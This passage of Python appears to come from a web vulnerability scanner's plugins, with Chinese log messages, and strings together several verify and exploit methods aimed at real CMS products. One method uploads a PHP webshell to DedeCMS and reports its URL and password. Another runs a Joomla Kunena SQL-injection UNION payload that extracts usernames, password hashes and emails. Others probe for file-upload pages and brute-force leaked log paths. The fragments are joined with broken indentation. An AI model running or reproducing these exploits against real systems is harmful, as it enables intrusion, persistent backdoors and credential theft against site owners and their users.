self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# 首先获取token。访问域名 + /dede/tpl.php?action=upload
s = requests.session()
r = s.get(self.target+'/dede/tpl.php?action=upload')
# 获取token
p = re.compile(
r'<input type="hidden" name="([0-9a-f]+)" value="1" />')
if p.findall(r.text):
token = p.findall(r.text)[0]
s.get(
self.target + '/dede/tpl.php?filename=cscan.lib.php&action=savetagfile&content=%3C?php%20phpinfo();eval($_POST[c]);?%3E&token={token}'.format(token=token))
verify_url = self.target + '/include/taglib/cscan.lib.php'
r = requests.get(verify_url)
if 'PHP Version' in r.text and 'System' in r.text:
self.output.report(self.vuln, '发现{target}存在{name}漏洞,已上传webshell地址:{url}密码为c,请及时删除。'.format(
target=self.target, name=self.vuln.name, url=verify_url))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
start = '2018-01-01'
end = '2018-12-31'
datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
dateend = datetime.datetime.strptime(end, '%Y-%m-%d')
while datestart < dateend:
datestart += datetime.timedelta(days=1)
payload = datestart.strftime('%Y_%m_%d')[2:10]
self.output.info('正在生成日志爆破字典')
vul_url = arg + '/Data/Log/' + payload + '.log'
response = requests.get(vul_url)
if response.status_code == 200 and 'INFO:' in response.text:
self.output.info('字典爆破成功')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
break
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# Refer http://www.wooyun.org/bugs/wooyun-2015-0108559
payloads = [
'/mana/edit/uploadattcah.jsp', '/mana/edit/attach_upload.jsp',
'/mana/edit/uploadimg.jsp', '/mana/edit/uploadmult.jsp',
'/mana/edit/uploadflash.jsp'
]
for payload in payloads:
#code, head, res, errcode, _ = curl.curl2(arg+payload)
r = requests.get(self.target + payload)
if r.status_code == 200 and ('_upload.jsp' in r.text
or 'uploadnexturl' in r.text):
#security_hole('Arbitrary file upload vulnerability '+ arg + payload)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
# 访问的地址
exploit = '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid='
# 利用union的方式(计算md5(3.1415))
payload = "-1/**/aNd/**/1=0/**/uNioN++sElecT+1,md5(3.1415)--"
# 构造漏洞利用连接
vulurl = arg + exploit + payload
# 自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
# 发送请求
resp = requests.get(vulurl, headers=httphead, timeout=50)
# 检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
if '63e1f04640e83605c1d177544a5a0488' in resp.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
target = arg + "/index.php?m=member&f=register_save"
data = {
"username":
"******",
"password": "******",
"password2": "123456",
"fields[truename]": "",
"fileds[email]": "",
"submit": " ? ? "
}
payload = urllib.parse.urlencode(data)
req = requests.get(target + "?" + payload)
if req.status_code == 200 and "ac59075b964b0715" in req.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
# 访问的地址
exploit = '/index.php?option=com_kunena&func=userlist&search='
# 利用Union方式读取信息
payload = "%' and 1=2) union select 1, 1,concat(0x247e7e7e24,username,"\
"0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users limit 0,1-- ;"
# 构造漏洞利用连接
vulurl = arg+exploit+payload
# 自定义的HTTP头
httphead = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
# 提取信息的正则表达式
parttern = '\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
# 发送请求
resp = requests.get(url=vulurl, headers=httphead, timeout=50)
# 检查是否含有特征字符串
if '$~~~$' in resp.text:
# 提取信息
match = re.search(parttern, resp.text, re.M | re.I)
if match:
username = match.group(1)
password = match.group(2)
self.output.report(self.vuln, '发现{target}存在{name}漏洞,获取到的用户名为{username} 密码为{password}'.format(
target=self.target, name=self.vuln.name, username=username, password=password))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
try:
self.output.info('开始对 {target} 进行 {vuln} 漏洞利用'.format(
target=self.target, vuln=self.vuln))
arg = '{target}'.format(target=self.target)
payload = "/manager/admin_ajax.php?action=save&tab={pre}thirdpart_config"
start = '2018-01-01'
end = '2018-12-31'
datestart = datetime.datetime.strptime(start, '%Y-%m-%d')
dateend = datetime.datetime.strptime(end, '%Y-%m-%d')
while datestart < dateend:
datestart += datetime.timedelta(days=1)
payload = datestart.strftime('%Y-%m-%d')
vul_url = arg + '/log/operate_' + payload + '.log'
respose = requests.get(vul_url)
if respose.status_code == 200 and 'loginame' in respose.text:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,获取的漏洞url地址为{url}'.format(
target=self.target,
name=self.vuln.name,
url=vul_url))
break
except Exception as e:
self.output.info('执行异常{}'.format(e))
